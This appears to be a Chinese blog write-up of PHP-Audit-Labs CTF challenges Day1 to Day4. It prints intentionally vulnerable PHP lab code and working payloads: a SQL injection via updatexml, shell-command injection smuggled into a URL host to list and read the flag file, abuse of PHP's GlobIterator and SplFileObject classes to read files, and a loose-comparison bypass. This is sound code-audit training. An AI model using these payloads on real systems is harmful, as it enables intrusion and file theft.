<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="PHP-Audit-Labs-CTF上篇前言  目前只做到第8题，后续再把其他的题目一起做完，这个CTF对想学习代码审计的同学还是比较有帮助的。推荐想学代码审计的同学把这十几题CTF做完，建议先自己动手和自己想思路，实在没有思路或者做不出再看解题思路 Day1Code  Github地址 解      id参数每次接收参数都会经过stop_hack函数进行过滤，但是过滤没有过滤干净，updatex">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP-Audit-Labs-CTF上篇">
<meta property="og:url" content="http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/index.html">
<meta property="og:site_name" content="\&#39;\&quot;&gt;&lt;h1&gt;123&lt;h1&gt;">
<meta property="og:description" content="PHP-Audit-Labs-CTF上篇前言  目前只做到第8题，后续再把其他的题目一起做完，这个CTF对想学习代码审计的同学还是比较有帮助的。推荐想学代码审计的同学把这十几题CTF做完，建议先自己动手和自己想思路，实在没有思路或者做不出再看解题思路 Day1Code  Github地址 解      id参数每次接收参数都会经过stop_hack函数进行过滤，但是过滤没有过滤干净，updatex">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/9jzcxmK4FO8Eq6v.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/9qhGdvB8gr6ToJL.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/DcoPsdNHTRLxCkB.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/vkD38WCzTM791pL.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/83FwsfVvTrUSgx6.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/3Hf9mUyINvdplEA.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/SI41ZqQg9e6Rlop.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/iRY8aEPFr7qJnoC.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/RV3MyuY2zBG7o9r.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/uw1eGSWRMpNQO4A.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/AfSh43qawXyTvY8.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/3YXEn51zat8UeWR.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/bC3xer6aYBtNikc.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/pGJ7TM9O4axb1YD.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/2fuwZ5byKsDhlSE.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/9GdNeJkEZY6RBun.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/R1LDfGgSNAnuwkT.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/pUPnlxQGk5mrSyg.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/Dp7hjGw2T8uMRkI.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/nH576JOl8kfSQYh.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/Najlwko1hrCPqVs.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/xDsameNY3MkyiwX.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/q72dQiW5JDMhBUw.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/pfhQLmtXinIc4b8.png">
<meta property="og:image" content="https://s2.loli.net/2022/01/11/yLVFsCqpaxdz9RM.png">
<meta property="article:published_time" content="2022-01-11T04:52:46.000Z">
<meta property="article:modified_time" content="2022-01-26T01:41:41.937Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="php">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2022/01/11/9jzcxmK4FO8Eq6v.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>PHP-Audit-Labs-CTF上篇</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/projects_url">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2022/01/26/PHP-Audit-Labs-CTF%E4%B8%8B%E7%AF%87/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2021/12/25/php-Xdebug%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&text=PHP-Audit-Labs-CTF上篇"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&title=PHP-Audit-Labs-CTF上篇"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&is_video=false&description=PHP-Audit-Labs-CTF上篇"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=PHP-Audit-Labs-CTF上篇&body=Check out this article: http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&title=PHP-Audit-Labs-CTF上篇"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&title=PHP-Audit-Labs-CTF上篇"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&title=PHP-Audit-Labs-CTF上篇"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&title=PHP-Audit-Labs-CTF上篇"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&name=PHP-Audit-Labs-CTF上篇&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2022/01/11/PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87/&t=PHP-Audit-Labs-CTF上篇"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#PHP-Audit-Labs-CTF%E4%B8%8A%E7%AF%87"><span class="toc-number">1.</span> <span class="toc-text">PHP-Audit-Labs-CTF上篇</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day1"><span class="toc-number">1.2.</span> <span class="toc-text">Day1</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Code"><span class="toc-number">1.2.1.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3"><span class="toc-number">1.2.2.</span> <span class="toc-text">解</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day2"><span class="toc-number">1.3.</span> <span class="toc-text">Day2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Code-1"><span class="toc-number">1.3.1.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-1"><span class="toc-number">1.3.2.</span> <span class="toc-text">解:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day3"><span class="toc-number">1.4.</span> <span class="toc-text">Day3</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#code"><span class="toc-number">1.4.1.</span> <span class="toc-text">code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-2"><span class="toc-number">1.4.2.</span> <span class="toc-text">解:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day4"><span class="toc-number">1.5.</span> <span class="toc-text">Day4</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-3"><span class="toc-number">1.5.1.</span> <span class="toc-text">解:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day5"><span class="toc-number">1.6.</span> <span class="toc-text">Day5</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Code-2"><span class="toc-number">1.6.1.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-4"><span class="toc-number">1.6.2.</span> <span class="toc-text">解:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day6"><span class="toc-number">1.7.</span> <span class="toc-text">Day6</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#code-1"><span class="toc-number">1.7.1.</span> <span class="toc-text">code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-5"><span class="toc-number">1.7.2.</span> <span class="toc-text">解:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day7"><span class="toc-number">1.8.</span> <span class="toc-text">Day7</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Code-3"><span class="toc-number">1.8.1.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-6"><span class="toc-number">1.8.2.</span> <span class="toc-text">解:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Day8"><span class="toc-number">1.9.</span> <span class="toc-text">Day8</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Code-4"><span class="toc-number">1.9.1.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3-7"><span class="toc-number">1.9.2.</span> <span class="toc-text">解:</span></a></li></ol></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        PHP-Audit-Labs-CTF上篇
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">John Doe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-01-11T04:52:46.000Z" itemprop="datePublished">2022-01-11</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/php/" rel="tag">php</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="PHP-Audit-Labs-CTF上篇"><a href="#PHP-Audit-Labs-CTF上篇" class="headerlink" title="PHP-Audit-Labs-CTF上篇"></a>PHP-Audit-Labs-CTF上篇</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>  目前只做到第8题，后续再把其他的题目一起做完，这个CTF对想学习代码审计的同学还是比较有帮助的。推荐想学代码审计的同学把这十几题CTF做完，建议先自己动手和自己想思路，实在没有思路或者做不出再看解题思路</p>
<h2 id="Day1"><a href="#Day1" class="headerlink" title="Day1"></a>Day1</h2><h3 id="Code"><a href="#Code" class="headerlink" title="Code"></a>Code</h3><p>  <a target="_blank" rel="noopener" href="https://github.com/hongriSec/PHP-Audit-Labs/tree/master/PHP-CTF-Docker/dockerfile_day1/day1">Github地址</a></p>
<h3 id="解"><a href="#解" class="headerlink" title="解"></a>解</h3><p>  <img src="https://s2.loli.net/2022/01/11/9jzcxmK4FO8Eq6v.png" alt="image-20220111002121397"></p>
<p><img src="https://s2.loli.net/2022/01/11/9qhGdvB8gr6ToJL.png" alt="image-20220111002103498"></p>
<p>  <code>id</code>参数每次接收参数都会经过<code>stop_hack</code>函数进行过滤，但是过滤没有过滤干净，<code>updatexml</code>函数没有例如黑名单中，这是一个可利用的注入点。结束过滤后，会经过<code>in_array</code>的函数因此我们还需要绕过<code>in_array</code>函数</p>
<p><img src="https://s2.loli.net/2022/01/11/DcoPsdNHTRLxCkB.png" alt="image-20220111002504939"></p>
<p>  至于如何绕过，说起来也简单，这里的对比没有采用强匹配，所以使用<code>1&#39;</code>即可绕过，因此<code>payload</code>应该为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1’ and (select updatexml(1,make_set(3,&#x27;~&#x27;,(select flag from flag)),1))</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/01/11/vkD38WCzTM791pL.png" alt="image-20220111002945585"></p>
<h2 id="Day2"><a href="#Day2" class="headerlink" title="Day2"></a>Day2</h2><h3 id="Code-1"><a href="#Code-1" class="headerlink" title="Code"></a>Code</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="variable">$url</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$url</span>) &amp;&amp; filter_var(<span class="variable">$url</span>, FILTER_VALIDATE_URL))&#123;</span><br><span class="line">    <span class="variable">$site_info</span> = parse_url(<span class="variable">$url</span>);</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/sec-redclub.com$/&#x27;</span>,<span class="variable">$site_info</span>[<span class="string">&#x27;host&#x27;</span>]))&#123;</span><br><span class="line">        exec(<span class="string">&#x27;curl &quot;&#x27;</span>.<span class="variable">$site_info</span>[<span class="string">&#x27;host&#x27;</span>].<span class="string">&#x27;&quot;&#x27;</span>, <span class="variable">$result</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;center&gt;&lt;h1&gt;You have curl <span class="subst">&#123;$site_info[&#x27;host&#x27;]&#125;</span> successfully!&lt;/h1&gt;&lt;/center&gt;</span></span><br><span class="line"><span class="string">              &lt;center&gt;&lt;textarea rows=&#x27;20&#x27; cols=&#x27;90&#x27;&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">echo</span> implode(<span class="string">&#x27; &#x27;</span>, <span class="variable">$result</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;&lt;center&gt;&lt;h1&gt;Error: Host not allowed&lt;/h1&gt;&lt;/center&gt;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;center&gt;&lt;h1&gt;Just curl sec-redclub.com!&lt;/h1&gt;&lt;/center&gt;&lt;br&gt;</span></span><br><span class="line"><span class="string">          &lt;center&gt;&lt;h3&gt;For example:?url=http://sec-redclub.com&lt;/h3&gt;&lt;/center&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// f1agi3hEre.php</span></span><br><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"><span class="variable">$flag</span> = <span class="string">&quot;HRCTF&#123;f1lt3r_var_1s_s0_c00l&#125;&quot;</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h3 id="解-1"><a href="#解-1" class="headerlink" title="解:"></a>解:</h3><ul>
<li><p>需要绕过parse_url和preg_match 两个函数才能执行exec</p>
</li>
<li><p>parse_url 是以<code>://</code>进行判断，<code>://</code>前面为协议，后面为host</p>
</li>
<li><p>preg_match则是正则匹配，匹配url结束是否为sec-redclub.com</p>
</li>
<li><p>现在payload组合：xx:// 系统命令 sec-redclub.com</p>
</li>
</ul>
<p><strong>Payload</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">linux:</span><br><span class="line">syst1m://<span class="string">&quot;|ls;&quot;</span>sec-redclub.com</span><br><span class="line">syst1m://<span class="string">&quot;|cat&lt;f1agi3hEre.php;&quot;</span>sec-redclub.com</span><br><span class="line"></span><br><span class="line">windows:</span><br><span class="line">syst1m://%22||dir||;%22sec-redclub.com</span><br><span class="line">syst1m://%22||<span class="built_in">type</span>,f1agi3hEre.php||;%22sec-redclub.com</span><br><span class="line"></span><br><span class="line">; 表示 连续指令</span><br><span class="line">| 表示 管道符左边命令的输出就会作为管道符右边命令的输入,即左边的结果为右边的输入</span><br><span class="line">|| 表示执行第一个命令成功将不执行第二个命令，如果执行第一命令失败将执行第二个命令</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="Day3"><a href="#Day3" class="headerlink" title="Day3"></a>Day3</h2><h3 id="code"><a href="#code" class="headerlink" title="code"></a>code</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">NotFound</span></span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;404&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">spl_autoload_register(</span><br><span class="line">    <span class="function"><span class="keyword">function</span> (<span class="params"><span class="variable">$class</span></span>)</span>&#123;</span><br><span class="line">        <span class="keyword">new</span> NotFound();</span><br><span class="line">    &#125;</span><br><span class="line">);</span><br><span class="line"><span class="variable">$classname</span> = <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>]) ? <span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>] : <span class="literal">null</span>;</span><br><span class="line"><span class="variable">$param</span> = <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;param&#x27;</span>]) ? <span class="variable">$_GET</span>[<span class="string">&#x27;param&#x27;</span>] : <span class="literal">null</span>;</span><br><span class="line"><span class="variable">$param2</span> = <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;param2&#x27;</span>]) ? <span class="variable">$_GET</span>[<span class="string">&#x27;param2&#x27;</span>] : <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(class_exists(<span class="variable">$classname</span>))&#123;</span><br><span class="line"></span><br><span class="line">    <span class="variable">$newclass</span> = <span class="keyword">new</span> <span class="variable">$classname</span>(<span class="variable">$param</span>,<span class="variable">$param2</span>);</span><br><span class="line">    var_dump(<span class="variable">$newclass</span>);</span><br><span class="line">    <span class="keyword">foreach</span> (<span class="variable">$newclass</span> <span class="keyword">as</span> <span class="variable">$key</span>=&gt;<span class="variable">$value</span>)</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$key</span>.<span class="string">&#x27;=&gt;&#x27;</span>.<span class="variable">$value</span>.<span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line">        </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">#f1agi3hEre.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$flag</span> = <span class="string">&quot;HRCTF&#123;X33_W1tH_S1mpl3Xml3l3m3nt&#125;&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h3 id="解-2"><a href="#解-2" class="headerlink" title="解:"></a>解:</h3><p>  其实我做该题的时候一直在<code>class_exists、sql_autoload_register</code>反复横跳，但是经过查看手册和思考发现<code>sql_autoload_register</code>无法加载<code>flag.php</code></p>
<p>  我的目光又回到<code>class_exists</code>，但是无法绕过<code>class_exists</code>，经过长时间思考也得不到结果，后面上网查询发现可以利用<code>php</code>自带的类进行绕过并读取文件</p>
<p>  我这里使用<a target="_blank" rel="noopener" href="https://www.php.net/manual/en/class.globiterator.php">GlobIterator</a>进行读取文件</p>
<p><img src="https://s2.loli.net/2022/01/11/83FwsfVvTrUSgx6.png" alt="image-20220106060752971"></p>
<p>  现在先写一下我们的<code>payload</code>，后续在解释<code>payload</code>各个参数的意思</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=<span class="built_in">GlobIterator</span>&amp;param=*.*&amp;param2=<span class="number">1</span></span><br></pre></td></tr></table></figure>

<p>  现在试一下我们的<code>payload</code></p>
<p><img src="https://s2.loli.net/2022/01/11/3Hf9mUyINvdplEA.png" alt="image-20220106061216326"></p>
<p>  <strong>payload</strong>运行成功，成功获取其他<code>php</code>文件名，现在解释一下我们的<code>payload</code>参数</p>
<ul>
<li><code>GlobIterator</code>代表<code>GlobIterator</code>类</li>
<li><code>*.*</code>代表搜索的文件名(可用正则)</li>
<li><code>1</code>代表<code>FilesystemIterator::CURRENT_AS_FILEINFO</code>，<code>0</code>则代表<code>FilesystemIterator::KEY_AS_PATHNAME</code></li>
</ul>
<p><strong>读取文件</strong></p>
<p>  这里我使用<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/splfileobject.construct.php">SplFileObject</a>原生类进行读取文件内容</p>
<p><img src="https://s2.loli.net/2022/01/11/SI41ZqQg9e6Rlop.png" alt="image-20220106062002972"></p>
<p>  先写<code>payload</code>，后解释</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=<span class="built_in">SplFileObject</span>&amp;param=f1agi3hEre.php&amp;param2=r</span><br></pre></td></tr></table></figure>

<p>  看下我们的<code>payload</code>是否能读取<code>flag</code></p>
<p><img src="https://s2.loli.net/2022/01/11/iRY8aEPFr7qJnoC.png" alt="image-20220106062847875"></p>
<p>  ok,现在解释一下<code>payload</code>的意思</p>
<ul>
<li><p><code>SplFileObject</code>代表<code>SplFileObject</code>类</p>
</li>
<li><p><code>f1agi3hEre.php</code>代表打开的文件</p>
</li>
<li><p><code>r</code>代表打开的方式(权限)</p>
<p><strong>该题我觉得比较有意思，让我知道php的自带类也可以这么利用</strong></p>
</li>
</ul>
<p>​          </p>
<h2 id="Day4"><a href="#Day4" class="headerlink" title="Day4"></a>Day4</h2><p>  该题目代码有点多，不合适放到文章中，点击<a target="_blank" rel="noopener" href="https://github.com/hongriSec/PHP-Audit-Labs/tree/master/PHP-CTF-Docker/dockerfile_day3">链接</a>自行下载</p>
<h3 id="解-3"><a href="#解-3" class="headerlink" title="解:"></a>解:</h3><p>  在看源码的时候我刚开始是怀疑存在<code>随机数</code>漏洞的，但是后来查阅PHP手册发现这几个函数不存在<code>随机数</code>漏洞。</p>
<p>  再然后我就把目光瞄到<code>session</code>上，后面看了一下代码，发现也没有相关漏洞，最后我看到对比的时候采用的是<code>==</code>，使用<code>==</code>会存在<code>弱对比</code>的情况，但是我测试时发现程序会将输入的值进行切片处理，没办法进行<code>弱对比</code>，后面发现是自己经验不足没想到使用<code>数组</code>类型输入来绕过切片处理</p>
<p>  <code>弱对比</code>代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>; <span class="variable">$i</span>&lt;<span class="number">7</span>; <span class="variable">$i</span>++)&#123;</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$numbers</span>[<span class="variable">$i</span>] == <span class="variable">$win_numbers</span>[<span class="variable">$i</span>])&#123;</span><br><span class="line">		<span class="variable">$same_count</span>++;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>  上述代码对比时由于使用<code>==</code>进行对比，该<code>==</code>的特定是<strong>只比较值，不比较类型</strong>，所以产生了弱对比，现在我们知道代码存在弱对比，开始利用，由于<code>弱对比</code>中<code>true</code>对比的结果都是<code>true</code>，有点类似数学中<code>0×任何数都是0</code>的意思，所以我们直接使用<code>true</code>进行对比</p>
<p><img src="https://s2.loli.net/2022/01/11/RV3MyuY2zBG7o9r.png" alt="image-20220106093327054"></p>
<p><img src="https://s2.loli.net/2022/01/11/uw1eGSWRMpNQO4A.png" alt="image-20220106093446655"></p>
